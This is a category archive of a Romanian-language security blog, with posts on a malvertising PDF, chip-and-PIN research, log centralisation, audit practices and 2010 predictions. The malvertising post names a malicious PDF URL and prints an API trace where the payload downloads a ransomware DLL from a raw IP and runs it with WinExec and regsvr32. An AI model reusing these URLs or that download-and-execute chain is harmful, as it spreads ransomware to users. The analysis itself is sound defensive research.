You are currently browsing the category archive for the ‘Razboiul Ideilor’ category.

Prima parte o puteti citi aici .

Dupa analiza trafiiculuui am ajuns la concluzia ca ofertantul de publicitate este (www.trafficrevenue.net).

Una din reclamele acestui ofertant, gazduita si pe 990.ro (http://ads.endoftheinternet.org/ku44/yoxlazgmkoaojme.pdf) contine un fisier pdf. (md5:675ec6a025d50f7dafef3992b46b7d41). Acest fisier contine un script java care are codul obfuscat. O incercare de a decoda codul javascript cu ajutorul (jsunpack-n.py) a condus la erori referitoare la inconsistenta codului java. Cine este interesat poate obtine o copie a acestului PDF.

Ceea ce face  pdf-ul destul de interesant este faptul ca modul in care a fost inserat scriptul  java  il face invizibil la tool-urile create de Didier Stevens.

Aceste tool-uri (pdfid si pdfparser) sunt folosite pentru a identifica continuturi periculoase in documente de tip pdf. Intre timp au fost incorporate si in site-ul de analiza a fisierelor suspicioase virustotal.com.

Pentru a putea sa decodez codul java am folosit site-ul Wepawet care a detectat codul java si l-a de-obfuscat. Dupa cum se poate vedea, scriptul java downloadeaza un fisier dll (wpbt0.dll).

Acest fisier modifica cheia shell din registri, blocheaza functionarea calculatorului si afiseaza apoi un mesaj cerand in limba germana plata unei recompense pentru a putea permite refolosirea calculatorului.

0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://62.109.12.153/ku44/isf.php?i=8, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)

 

Ce se poate face? Cum am spus si in prima parte – firefox cu noscript.

PS. Puteti sa cititi in comentariile de la primul post punctul de vedere al administratorului site-ului 990.ro. Referitor la mesajul sau vreau doar sa subliniez ca este datoria administratorului sa verifice ce ofertanti de publicitate alege. Un simplu search pe google ar fi un inceput bun.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, trafficrevenue.net appeared to function as an intermediary for the infection of 11 site(s) including shareapik.blogspot.com/, americanfootballphotos.com/, watchthewalkingdead.blogspot.com/.”

Anunțuri

Am reusit sa gasesc cateva articole interesante despre cazul „HBGary”.  A devenit rasunator nu datorita gradului ridicat de sofisticare a atacului ci mai ales a faptului ca o firma de securitate ignora voit principiile pe care le „vinde” clientilor. Dotorita arogantei?  Va recomand sa cititi cu atentie istoria intregului incident impreuna cu dreptul la replica a celor de la Anonymous.

Istoria Incidentului

Dreptul la replica

Acum ceva timp am relatat despre atacut impotriva sistemului de autentificare PIN/Card, descoperit de cativa  cercetori de la universitatea Cambridge condusi de Ross Anderson. Acum cateva zile insa am descoperit pe site-ul lui, raspunsul la o scrisoare a Asociatiei Britanice a cardurilor care cerea scoaterea de pe site-ul universitatii a studiului in cauza. Mi-a placut foarte mult raspunsul lui care suna cam asa.

Cambridge is the University of Erasmus, of Newton, and of Darwin; censoring writings that offend the powerful is offensive to our deepest values.

Frumos spus…si la multi ani si voua.

TED pentru cei care nu stiu, este o initiativa minunata de a aduna oameni cu idei exceptionale .
Una din prezentarile care mi-au placut cel mai mult in domeniul de tehnologie, este cea a lui Yochai Benkler. Plina de pasiune, plina de adevar, plina de esenta si realism despre miscare open source.
Seat back and enjoy here.

Caut de mult o analiza a posibilelor solutii de mitigare a riscului ca administratorul bazei de data poate vedea datele/exporta datele de bussines. Am gasit acum o presentare a lui Ralph Durkee care a fost prezentata la una din conferintele OWASP. Solutia care se detaseaza ca fiind cea mai practica si care acopera cele mai multe risk-uri este criptarea unor coloane din baza de data folosind pachete standard DBMS_Crypto cu stocare chei simetrice in layerul de aplicatie, in afara bazei de date. O implicatia majora este nevoia de clasifica datele ce trebuiesc sa fie criptate si ca toate aplicatiile care acceseaza datele trebuiesc rescrise. Link-ul catre presentare aici.

Have fun…

Cercetatorii de la Universitatea Cambridge, condusi de Ross Anderson,  au descoperit o noua problema de design a sistemului de autorizare a tranzactiilor cu ajutorul cip-ului si  a pin-urilor. Comunicatia dintre un card cu cip si un terminal se face printr-un protocol neautentificat, care informeaza terminalul ca autorizarea se poate face cu cip si pin, cu ajutorul semnaturii sau niciuna. Dar daca autorizarea s-ar face cu cip si semnatura? Cazul in care cardul ar transmite terminalului ca autorizarea se face pe baza de cip si semnatura, atunci banca crede ca autorizarea se face cu pin, si cip-ul ca se face prin intermediul semnaturii. Este inspaimantator, pentru ca in acest caz hotii de carduri nu au nevoie sa mai cunoasca pin-ul pentru a autoriza tranzactii. El trebuie doar sa pacaleasca terminalu si atunci poate introduce orice pin.

Aici un reportaj BBC despre cit e de usor, si articolul original poate fi citit  aici cit si comentariile despre lui Bruce Schneier.

Aveti grija cu cardurile pierdute.

Verified by Visa si Mastercard SecureCode au fost obiectul analizei unui grup de cercetatori de la Universitatea Cambridge. Postul initial semnat de unul din autori Ross Anderson si mai multe reflectii asupra studiului se pot gasi aici. Aceasta analiza a vulnerabilitatilor de design, a acestor sisteme de autentificare, a atras multe reactii si discutii printre care cea mai notabila este  acea a celor de la RSA, urmata apoi de raspunsul autorilor. Intreaga dezbatere este o frumoasa lectie de concepte de securitate. Merita citit pe  blogului lui Bogdan Manolea, postul si comentariile referitoare la acest studiu recent.

Have fun.

Btw. Ati trimis flori la inmormantarea lui IE6? Microsoft-ul a facut-o. Citeva poze de la inmormintare se gasesc aici. lol

Have fun

HTTP-ul ca protocol nu a fost niciodata gandit sa suporte conceptul de sesiuni. De aceea au fost introduse elemente suplimentare care sa contina informatia de stare, cum ar fii cookie-urile sau ID-urile de sesiune.

Acum se profileaza o noua ideea ca in momentul actual informatiile care identifica browser-ul vostru, pot oferi atitea elemente de unicitate incit sa  poata fi folosit in viitor ca element de identificare al sesiunilor. Care este avantajul? Informatiile stau pe server si nu sint direct modificabile de utilizator.

Electronic Frontier Foundation (EFF) a creeat un nou tool online denumit Panopticlick care calculeaza unicitatea browser-ului vostru bazat pe informatii cum ar fi User Agent-ul, header-ele HTTP acceptate, plug-in-urile din browser, time zone, dimensiunea screen-ului si storage settings-uri.

Nu stiu daca aceste informatii vor fi de ajuns pentru a putea inlocui mecanismele actuale de mentinere a sesiunii, dar sint convins ca sint o baza reala pentru procesele de computer forensic.

Saptamana aceasta, citind blogul lui Daniel Missler, am dat peste un post foarte interesant, care propune o noua arhitectura de folosirea a browserelor in organizatii. Ceea ce propune el si Steve Crapo este o infrastructura de masini virtuale, localizata in DMZ, care sa fie folosita pentru browsing. Userilor nu li se va mai permite accesul din interiorul organizatiei direct la Internet, ci numai prin conectare la niste masini/desktop-uri virtuale, localizata in DMZ, care vor fi usor de mentinut, patch-uit si restabilit in cazulin care una din masini este compromisa. Solutia pare interesanta si datorita protectiei oferita la posibilul upload in internet a informatiilor existente in organizatie.

Ce prere aveti? O astfel de solutie ar avea succes in organizatia voastra? Ar fi acceptata de utilizatori?

Intreg articolul aici.

Have fun

Ross Cooper de la Verizon Bussines Security a scris citeva predictii pentru 2010, pe care as vrea sa le comentez putin.

1. Services will protect themselves: Facebook, Google, Twitter, TinyURL and the like will gain more control over criminal content… Intr-un an in  care „iesirea din criza” este cuvantul la ordine, nu vad companiile investind semnificativ in domeniul de securitate. Doar sa ne amintim ca Microsoft a ratat o versiune de Windows cu Vista,  facind un produs sigur dar greu acceptat de utilizatori. Isi permit aceste companii investitii in securitate sau se vor concentra pe consolidarea cistigurilor? Raspunsul cred ca il stim cu totii.

2. Malware will not evolve. No significant changes in malware will occur in 2010. Consider ca 2010 va fi anul in care criptografia isi va face prezenta simtita foarte pregnant in domeniul de concepere  si distributie a malware-ulurilor. Anul de raspandire a virusilor criptografici.

3. Consumers are getting smarter: The number of older “newbies” being introduced to the Internet’s crime is going to be significantly less in 2010 than in the past.  Tehnologia este din ce in ce mai prezenta in viata noastra. Aflam despre patch-uri pentru Windows de la buletinele de stiri. Deci folosirea tehnologiei va fi mult mediatizata si atunci ca rezultat, nivelul cunostintelor de securitate IT va creste.

4. Windows 7 (not necessarily IE8) will prove to be more robust than expected, but ISV’s will have the light shone on them by MS as the attacks move more towards the applications (and, possibly, away from browser exploits.) ATL issues in ISV products will have a spotlight in 2010 (those that don’t use IE to do their interactions.). Observatiile de la primul punct cred ca sunt valabile si aici. Windows 7 va fi o solutie robusta, dar ISV (Independet Software Vendor) vor oferi intotdeauna o portita. Long life Adobe.

5. Serious finger-pointing and frustration over basic essential protocols (SMTP, DNS) will occur amongst “governments”, and non-technical organizations as spam and phishing prove even more difficult to thwart. Serious finger-pointing poate, dar nu vad adoptarea unor masuri coerente sau finantarea unor solutii de genul DNSSEC.

6. Breaches will increase, albeit possibly smaller in average number of records compromised. There will be more money transfers made via accounting staff compromised credentials in 2010 than past years. Companiile de procesare de carduri/bancile vor incerca sa evite orice fel de probleme de securitate si de expunere a datelor. Visa si Mastercard vor taxa scump pe cei care nu vor lua masuri de securizare.

7. Nothing of note happens to non-PCs (e.g. phones, PDAs, Macs, etc). Cred ca vom vedea aici primele atacuri in masa. PDA-urile sunt noile tinte, sunt device-urile care sint target-ate de noile platforme de networking.

8. CaaS works, not surprisingly for most of us. CaaS (Communications-as-a-Service) va deveni noua tinta. Aici se va concentra informatia si granitele vor fi din ce in ce mai greu de tras si prin urmare de aparat.

9. Virtualization does not come under real-world attack as a target, but the media will sensationalize at least one story where VM’s were involved (but the VM software had nothing to do with the issue.) Joanna will continue to ride her horse. Aici sunt de acord.

10. China will continue to be blamed for everything. Evident ca asa va fi, dar as reformula China and the Romanian Hacker will continue to be blamed for everything.

Have Fun in 2010.

Se pare ca acest exploit „Aurora”, care nu este cu nimic mai spectaculos decit alte exploit-uri,  este atit de mediatizat incit ajunge sa aiba parte de exagerarile caracteristice presei de cancan.  De exemplu BankNews anunta pompos ca „Germania recomanda utilizatorilor sa nu mai foloseasca browser-ul Internet Explorer al Microsoft” cind de fapt comunicatul oficial spune „BSI recomanda folosirea temporara a unui browser alternativ”.  Isterie legata de tehnologia IT. Interesant.

Don’t panic and have fun.

Din ce in ce mai multi administratori si persoanele care sint implicate in Securitatea IT ridica problema centralizarii log-urilor. Inainte de a lua o astfel de decizie este bine sa se fie clarificate citeva aspecte privitoare la o astfel de solutie.

De ce? – in primul rind.

– creste vizibilitatea asupra problemelor existente in retea

– ajuta la scaderea timpului de remediere a problemelor printr-o identificare si corelare mai usoara

– ajuta la identificarea anomaliilor in retea si depistarea posibilelor incercari de atac asupra infrastructurii IT

– ofera statut de “conform cu standardul” pentru organizatiile ce incearca sa obtina certificari de tip PCI

– oferirea de rapoarte de catre departametul IT pentru  management si alte departamente

– pentru procesul de IT forensics.

Dar ce trebuie tinut minte inainte de a putea sa te gindesti la achizitionarea si implementarea unei astfel de solutii.  Daca pretul stocarii informatiei scade continuu in asa fel incit  solutiile hardware sa devina din ce in ce mai accesibile,  noi probleme trebuie rezolvate.

Normalizarea. Pentru a putea corela evenimentele si pentru o mai buna ierarhizare, logurile trebuiesc normalizate. Ce inseamna termenul de normalizare? Convertirea logurilor din diferite formate intr-un format care sa permita interpretarea, corelarea si raportarea. De exemplu logurile de la Windows Server 2008 sint diferite ca format de cele de la 2003. Blocarea unui pachet este logata diferit de IPTables in Syslog sau de Cisco ASE.

Solutia s-ar putea sa fie adoptarea standardului  Mitree CEE (Mitre Common Event Expression), adoptat de majoritatea ofertantilor de soft incepind cu Oracle si Microsoft si terminind cu Syslog.

Raportarea. Pentru a procesa un volum mare de informatii si a detecta ceea ce este important, este nevoie ca sistemul sa poata suporta crearea automata de rapoarte, accesarea lor pe baza de autorizare si transmiterea lor  pe cit mai multe canale (SMS, email, Web).

Design. Sistemele de logging inca tind sa foloseasca UDP-ul ca protocol de transmisie. In cazul unei arhitecturi distribuite trebuie luata in considerare o arhitectura bazata pe protocolul TCP. De unde se colecteaza logurile? Acum se colecteaza in principal de la sisteme de operare si dispozitive de retea. Dar in acest moment conectarea bazelor de date si aplicatiilor devine necesara pentru a putea avea si un mecanism robust de DLP (Data Loss Prevention)

Implicare. Managementul trebuie sa acorde suport pentru construirea unei astfel de solutii, pentru alocare resurselor care sa monitorizeze si sa interpreteze informatiile oferite. Totodata Log Management-ul trebuie sa devina parte din procesele curente de IT si de “Incident Response”.

Exista solutii comerciale: Arcview, Intellitactics, LogLogic, Splunk sau AllienVault. Recomandarea mea ar fi sa incepeti cu o solutie  demo, de la Splunk sau AllienVault, invatati ce poate oferi un astfel de sistem, definiti-va cerintele si apoi daca mai ramin si bani, indreptati-va catre o solutie comerciala.

Have Fun,

During a recent password audit in a company – it was found that a person was using the following password:
MickieMinniePlutoHueyLouieDeweyDonaldGoofySacramento

When asked why such a long password – she said she was told it had to be 8 characters and include at least one capital…

Voi ce parere aveti?

Adia astept sa citesc o carte. Este vorba de Daemon lui Daniel Suarez. De mult nu am mai auzit atit de multe aprecieri si elogii asupra unei carti despre tehnologie, de la aparitia seriei de carti de la Syngress „How to own a …”.  Ceea ce m-a convins sa vreau sa citesc aceasta carte este un interviu pe care l-am auzit in Pauldotcom.com cu autorul si pe care va invit sa-l ascultati. Despre ce este vorba? Despre modul in care societatea de azi este atit de mult si atit de complicat interconectata tehnologic incit afectarea unei parti duce la efecta dramatice pentru intreaga civilizatie. Suna interesant? Astept paririle voastre despre carte.

In Wired am citit saptamina trecuta ca firma CardSystem Solutions, care a fost in anul 2004 victima unui atac informatic, va da in judecata firma de audit Sawas.

Motivul este ca firma de audit certificase cu 3 luni in urma procesatorul de carduri conform standardului CISP (Cardholder Information Security Program), precursor al actualului standard PCI DSS. Rezultatul acestui atac a fost furtul a 263000 de informatii despre carduri si compromiterea a altor 40 de milioane de carduri. Modalitatea in care a decurs atacul contravenea susnumitul standard. Pentru cei care nu stiu, standardul PCI DSS. este un standard de securitate IT impus de firmele de carduri de credit, gen Visa, Mastercard, procesatorilor de tranzactii si bancilor. Aceasta disputa legala, oricum se va termina, scoate la lumina anumite aspecte trecute cu vederea de tot sistemul creat in jurul certificarilor si acreditarilor. Primul comentariu al articolului din wired este:

As a former IT Auditor, I can tell you this with certainty: even the most skilled, detail-oriented IT Security Professional can only report what his or her manager will let him or her report. I audited Fortune 500 companies and there were always gaping holes in their IT security. I always reported them. But, in an attempt to keep future business, my management demanded that I remove many findings from my reports. Even though I refused to sign those reports, I bet I could still be held liable. I lost my job for being insubordinate. Watch for more of this in the future.

.

Comentariul imi aduce aminte de experienta mea de auditor, cind am intilnit situatii asemanatoare – frustrante si care deformeaza insasi scopul auditului, de orice fel ar fi el. Credeam ca se intampla asa doar la case mari dar, discutind acum ceva timp cu directorul departamentului de certificare al unei firme de securitate din Romania, am auzit ca aceleasi probleme sint si in sistemul romanesc. Rapoartele sint aranjate pentru a nu pierde clientul – desi clientul pierde mult mai mult tot negociind finding-urile unui audit.

Va schimba acest proces ceva? Nu cred ca va aduce schimbari imediate, dar sper ca va schimba treptat gradul de responsabilitate al clientilor si va obliga firmele de audit sa fie mai interesate de acuraterea muncii lor decit de pastrarea portofoliului de clienti. Este o aberatie sa platesti ca sa afli ce nu e in regula pentru ca pe urma, in loc sa treci la remedieri, sa incerci sa faci din armasar tintar in orice forma poti.

Articolul original poate fi citit aici.

Ce parere aveti voi? Ati avut experiente similare?

La cafea citeam astazi o stire in Hotnews despre o noua „reusita” a hackerilor romani. Victima Kaspersky LAB. Dupa mine devine plictisitor cum chiar firmele de securitate nu reusesc sa inteleaga concepte precum Defence in Depth (citeste aici) . Ma gindesc ca daca aceasta firma care ofera produse de securitate nu intelege conceptul, cum va reusii sa ofere un produs de securitate care sa fie „sigur”?  Se pare ca nu reuseste sa inteleaga conceptul de Input Validation tinind cont ca pe data de 02.02.2009 sint anuntate in Securityfocus  Multiple Kaspersky Products ‘klim5.sys’ Local Privilege Escalation Vulnerability”.  Trist.

Dar altceva doream sa va supun atentiei. Un articol de pe site-ul Darkreadings semnaleaza ca mai multe firme de securitate printre care Immunity, Milw0rm  si Packetstorm au fost supuse unui atat DDOS de mare amploare. Printre target-uri se afla si proiectul Metasploit. H.D. Moore scrie pe blogul proiectului ca aceste tipuri de atacuri cu toate ca sint necomplicate sint enervante, nevazind nici un rost in aceste atacuri deoarece atacurile impotriva unui proiect Open Source nu produc pierderi in domeniul vinzarilor. :-))  . Eu speculez mai departe si ma gindesc ca aceste atacuri nu sint decit un parte a unui proiect mai mare. Site-urile respective ofera exploit-uri. Parerea mea este ca atacatorii au incercat sa opreasca accesul oamenilor la site-urile cu exploit-uri pentru a-si mari acea „Window of opportunity”,  sau intervalul in care un exploit poate fi folosit de cei ce l-au descoperit pina devine public. Articolul poate fi citit aici. Voi ce parere aveti?

Ieri colegii mei au fost la o prezentare de produs a firmei Intellinx. Firma s-a specializat in sisteme de supraveghere online si detectare de frauda. Ce inseamna asta? Un server este legat in SPAN port-ul swith-urilor tale  si devine panaceul universal al tuturor problemelor de frauda.

Eu am refuzat sa ma duc, pentru ca conceptual acesta filozofie mi se pare falimentara.  De ce? O companie de la o anumita marine are propriile procese, care sint foarte greu de implementat algoritmic intr-o masinarie. Niciodata procedura nu va fii atit de frumosa incit sa-ti permita o transpunere a ei in matematica. Si chiar daca reusesti sa o transpui atunci iti ramine un numar finit de exceptii care trebuie filtrate. Deci cineva care stie acel proces, trebuie sa i-a decizia de bine sau rau. Oricum este o solutie reactiva, cu toate ca compania are ca logo „Get Proactive about insighter thread”. La design-ul unui sistem trebuie puse acele puncte de control care iti vor permite sa eviti frauda si sa minimizezi anomaliile.

Ce parere aveti voi?

Septembrie 2017
L M M M V S D
« Mar    
 123
45678910
11121314151617
18192021222324
252627282930